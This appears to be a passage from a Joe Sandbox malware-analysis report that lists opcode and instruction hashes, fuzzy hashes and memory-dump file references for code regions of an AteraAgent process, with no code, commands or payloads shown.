                                                                                                                                                                                                                                          • Opcode ID: b857642c789ee0b35a58cb3e6bc56d9045dd992954ff20215a6addfd48f9c487
                                                                                                                                                                                                                                          • Instruction ID: 9ef235ab3b16f54622058ab127cfd840e06a6256e527b7f2aad970b333ddc64a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b857642c789ee0b35a58cb3e6bc56d9045dd992954ff20215a6addfd48f9c487
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 00410871B05A4E8FEB94EB2C84596B53BD1FF5A341F4040BAD44EC72A3ED259C458780
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 4ef40a3e469c0bebc56182da64553dc3775d2f3576286383644aacbdb8a9267e
                                                                                                                                                                                                                                          • Instruction ID: 3e93a86f5eb670c1c70856795d3e1492416b57d9e8666cce31e6be72dc69152f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4ef40a3e469c0bebc56182da64553dc3775d2f3576286383644aacbdb8a9267e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C2313E21749C1A8FEAA4EF4CE094BA473D1FB9D3A0B1445B6D14EC73A6D929EC458B80
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 4d1fb3ff886e168e76a94056232b852d856dcdc453940eee6f2f04a120b9f8e1
                                                                                                                                                                                                                                          • Instruction ID: a447eb0e0f86dfa61152cf368846c7dadb2d4c757f2d73f196cb7f60ce575346
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d1fb3ff886e168e76a94056232b852d856dcdc453940eee6f2f04a120b9f8e1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C31E532B19D1D8FEBA4EB1C94997B93BE5FB99390F04417AE40EC3296DE14AC0647C1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 08fe730844cdc48c1ebe388a05abc1450fa1b40fea8fa03be691e38ca39eaec9
                                                                                                                                                                                                                                          • Instruction ID: 7e8685f5c08d1d26132d7719e8f8d9da925e22e48ba660947fe32474a25a76a2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08fe730844cdc48c1ebe388a05abc1450fa1b40fea8fa03be691e38ca39eaec9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 20318C52A0DF8A8FEBA4E7A894956B877E5DB99380F0445BAC00EC7193DC2A5C4B47C1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 02ea72496064855d331bb2b721494c827303d99dd463865781c4b307c47c0b1f
                                                                                                                                                                                                                                          • Instruction ID: 76cc695b96905e56def9d4632dd022a02ca64c04a608d937ab35dda32e7084f2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 02ea72496064855d331bb2b721494c827303d99dd463865781c4b307c47c0b1f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EB31B370619A0ACBD729EB18D088A7573D5FF5A344F50817DD05FC72A2DE35B84A87C0
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: c40071860a1eec76f0f9605d474289222064d13b9f392981adb4f423ff140939
                                                                                                                                                                                                                                          • Instruction ID: ac353bc5a81432cc3e63c7741935cbec52e40228f30867b45db8f99b7aa92c85
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c40071860a1eec76f0f9605d474289222064d13b9f392981adb4f423ff140939
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4931D62160C9464FD656F77CD0919FA3BE59F85354B1844B9D08FCB2A3CE14688ACBC4
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: dc1d6599074f02b2948d17fe597e58f505c8e40f5c0c64e7d63f58a605569649
                                                                                                                                                                                                                                          • Instruction ID: e1e2e5d532bf9b4371c2950c46f95b0c89f6f2d24f69eeb0e89b7249d2d68445
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc1d6599074f02b2948d17fe597e58f505c8e40f5c0c64e7d63f58a605569649
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B43138A2E08B8A8FE744DBB8C4126F9BBE4FF56380F4405B5D10DC71E3DD2958468B91
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 20cc356f96c83ef4c1e6114d14c500a0d97cad66fc889fd6455921552a64c99f
• Instruction ID: d196692f7ada73752d47a77c9c3b4d991cc38a8f93b57b8f0e643f3bf6a06d93
• Opcode Fuzzy Hash: 20cc356f96c83ef4c1e6114d14c500a0d97cad66fc889fd6455921552a64c99f
• Instruction Fuzzy Hash: E8319022B1A81A8FEB54A75CE455BF837E5EB9A360F0841B6D00EC7297DD19684687C0
Memory Dump Source
• Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 47da13df0723a5d2413ab5e1de3e05c98629424134d5a5e4b9af783990dc1045
                                                                                                                                                                                                                                          • Instruction ID: 73efaafc320fb11f4256326facad6949cad0dfe14246afa944d44813cccf9e6b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 47da13df0723a5d2413ab5e1de3e05c98629424134d5a5e4b9af783990dc1045
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F42139B270DE8F4FEAD8E71C645527923C6EB892E1B54817AD84EC32D6DD16DC0643C0
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: b8b5905c28605196443a0beb9929c6da60baca17383f07d64f5d5303d666749c
                                                                                                                                                                                                                                          • Instruction ID: e41ca0bee1b98ac0c1585906614b19ea0575a1b1ae8cee5e366d092b4d4d5a52
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b8b5905c28605196443a0beb9929c6da60baca17383f07d64f5d5303d666749c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FD31E831A1DA868FE7A0C7289444675B7D1EFA93A4F08057FD44DD22B3CB15E989C386
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 3f090cbb863b820d4e909e98f01be65e5c2764a03382874359132e4675889b68
                                                                                                                                                                                                                                          • Instruction ID: de07726807f668113cbceb9725e46fbde1891a8cde799f7e78eeba41c949858c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3f090cbb863b820d4e909e98f01be65e5c2764a03382874359132e4675889b68
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 31318330909A8E8FEB85DF68C4556A93FE4EF1A345F04407AE44ED31A2CA299855CBD1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: c944895a818cd6efd2bd657fe1e2a13da3e5af22b747c3bf0ff4dd590681c386
                                                                                                                                                                                                                                          • Instruction ID: 52954cb1c64b080a7514df308194e0e113d593134fd3ac9067fdb5576f08696a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c944895a818cd6efd2bd657fe1e2a13da3e5af22b747c3bf0ff4dd590681c386
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C31C520B1DA998FDB95DB2D905567937C1EF99740F1041BAF48FC32A7CE28A84987C2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 8a6fc9cf9f5aa9acdeb6bce67291c62f038d589fc5a3a097d360fa7b63182c17
                                                                                                                                                                                                                                          • Instruction ID: 7259f74b2b3673c65b338ae8e9cd2f6212c5b49999f8f3b63e8784a79754b023
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8a6fc9cf9f5aa9acdeb6bce67291c62f038d589fc5a3a097d360fa7b63182c17
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D5313A7281CBC68FD745EB38C855665BBE0EFA6340F0445BAD08EC71A2DE24A9498782
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 7b2851403d64652dc920e0e11a30938416272db4bb194c4c3ad4f5f1e9545403
                                                                                                                                                                                                                                          • Instruction ID: 4d38e716d55e974463e3743cd506f2bdf1a0f64c7460dc5d16f0194d5bb4b5bd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b2851403d64652dc920e0e11a30938416272db4bb194c4c3ad4f5f1e9545403
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B0410B70D0961D8FEB98EB64C4A57FAB6B1EF65341F5000AED00ED7292DB385985CB11
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 62fbbec58b473b03bb024e58bb740bd356ef8b8c8ea080b7177b0eb79e8b5f0a
                                                                                                                                                                                                                                          • Instruction ID: 80272875c5bfb0fcb4b82580477a2ba482c649f7f0229318de077468d433b23d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 62fbbec58b473b03bb024e58bb740bd356ef8b8c8ea080b7177b0eb79e8b5f0a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC31089250EBCA8FE755A73CC8155763FD5DF5778070880FAD089CB1A7D818AC0E8380
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 3aef997035401abf53eff63a03fb6684bd27ab73b70e3a6b043b06c254be7453
                                                                                                                                                                                                                                          • Instruction ID: 0a8a1788066fce40f86daa1beca8f464f86a26349389e26839148a47e7ba8df5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3aef997035401abf53eff63a03fb6684bd27ab73b70e3a6b043b06c254be7453
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1931CD3150E7C68FD7578B2898A16913FF0EF07310B1A44DBC489CB0B7E6689C4AC762
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: d4b8c636871b4abdc1ec5c18518466ae4d98f2adff49d708aff7f15bbb69f501
                                                                                                                                                                                                                                          • Instruction ID: 936e7c5950ffedcfa78b5d4ea8f49b4aba403152c9c117255af361c7effe4dbe
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d4b8c636871b4abdc1ec5c18518466ae4d98f2adff49d708aff7f15bbb69f501
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 90314CA2E0D78A8FE744D7B8C412AFABBE5EF56380F4041B6D00DC71D3CD1918468B91
Memory Dump Source
• Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 4bb529fc30edcd455845610055e696467e8431883d2aa403c00362b4ff53d969
                                                                                                                                                                                                                                          • Instruction ID: b550c3b9ac7637ee84e8d673280e1957e17eeba85e09438bb84cd50f808921c8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4bb529fc30edcd455845610055e696467e8431883d2aa403c00362b4ff53d969
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14215E71D08A5D8FDF84EF68D855AEEBBF1FF69340F40047AE409E3291CA34A9418B91
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 37ad8e8628745808226b5e9404c8c744a47ab18eb19bd4d3bb47f667012a3227
                                                                                                                                                                                                                                          • Instruction ID: e6c584fe7a1f0a9588e2f3a237cc7541cdc0bd225e21c15a3576458732c159ac
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 37ad8e8628745808226b5e9404c8c744a47ab18eb19bd4d3bb47f667012a3227
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D11E532B1DE0B4FABE8D61C705567963C6E7D82A5714457BD40EC3299ED16DC434384
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 2bac1bff4d56d8c38a6b6e8223a99ea0516e6bec7b752c959cc278ba9658620e
                                                                                                                                                                                                                                          • Instruction ID: 7af827f65ab22d5868deea561aac6fba57e58c204ef45d3725a1478f511d0d45
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2bac1bff4d56d8c38a6b6e8223a99ea0516e6bec7b752c959cc278ba9658620e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F113D52A18F8B8FDB99D76CD4A05F473D5FF99240B48487AD00DCB1D7ED18E8068781
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 6829ecd55f9ff3d8e77bb531a2193bcdc81f8a8fe0228f4b5d1a82b566847d0e
                                                                                                                                                                                                                                          • Instruction ID: a7f36a483b78583d2cac0035bb7e78e9c62ddfc7da9a606f93a2a5028cce9408
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6829ecd55f9ff3d8e77bb531a2193bcdc81f8a8fe0228f4b5d1a82b566847d0e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A211E761B1EE868FE7A583692C551743EC5DF5665074940FBD41DC32B7DD528C094382
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: ed9e5d2977250e3bdab72730bf9ae7f7fa5e08bfc7ed0e508dfdc4c4fa09d33e
                                                                                                                                                                                                                                          • Instruction ID: 0645d9995704b2843ade5d2977bdcb639ca0a60054bc724d2a2365442aebb8fe
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ed9e5d2977250e3bdab72730bf9ae7f7fa5e08bfc7ed0e508dfdc4c4fa09d33e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A1112532B2ED4A8FEBE9829D3C551783AC5DF9A65074940BBE80DC3267DC138C4983C2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 896270b5067e6b5c8deddf3b15365e61785028b80d719940d07c534ba04baf4a
                                                                                                                                                                                                                                          • Instruction ID: 7c499c702a8386cd3867bc55b2d4fa7efa447ef5766caea36eb92720e0f6b6f8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 896270b5067e6b5c8deddf3b15365e61785028b80d719940d07c534ba04baf4a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E01CC7374DA0D8FA69CFA0CA8469B437D1EB5A2B030405ABD44EC7662E802EC834786
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 99f1121cc8fa9aafa12cd112d492eaae3df2e510c4912c81201c386d65ef5938
                                                                                                                                                                                                                                          • Instruction ID: 35121f6b7bc4cfbf8f3d0ae48489aba1ff3b0615e5f2bd6bc784eaaa7b6d3ee9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 99f1121cc8fa9aafa12cd112d492eaae3df2e510c4912c81201c386d65ef5938
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4118272B1EF4B8FEAA8DB0C702427963D2EBA9295714857ED00EC7195DD15AC0E8380
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: eef06ab8d210c002fe0e9af5ead34a2ff14e140b118b6d77200a28202f189ab6
                                                                                                                                                                                                                                          • Instruction ID: 20bdd022a3fda316f42b9f7ca39370c8f5b900dd58baad94ee3262a10bb3789f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eef06ab8d210c002fe0e9af5ead34a2ff14e140b118b6d77200a28202f189ab6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C11913170581A8FE9A4EB5D9498A3A33D9FF8A340F50457EE04FC36A3DE14AC4583C4
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
Memory Dump Source
• Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: d625300d33704d2cdac28c79de4b9c9328fef2a4fb0ff4bedb8618d9a2ddbfbd
                                                                                                                                                                                                                                          • Instruction ID: 792f962feaf5d64580403cd370c99c96a4937dab2f84359e4cd8519d4c603205
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d625300d33704d2cdac28c79de4b9c9328fef2a4fb0ff4bedb8618d9a2ddbfbd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 52110630618A168FD769E738D488BA577E1FF45300F1485ADC48FC7296EA29B8C6C780
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 5487bd8e90804d517be8d1a387838a89e4a5bcd1af44ded9b8799468d6c9c68a
                                                                                                                                                                                                                                          • Instruction ID: a145eb0aa100e7099fd4f76a68338b2d8c6b63b00afb3e466bfbca63e6057800
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5487bd8e90804d517be8d1a387838a89e4a5bcd1af44ded9b8799468d6c9c68a
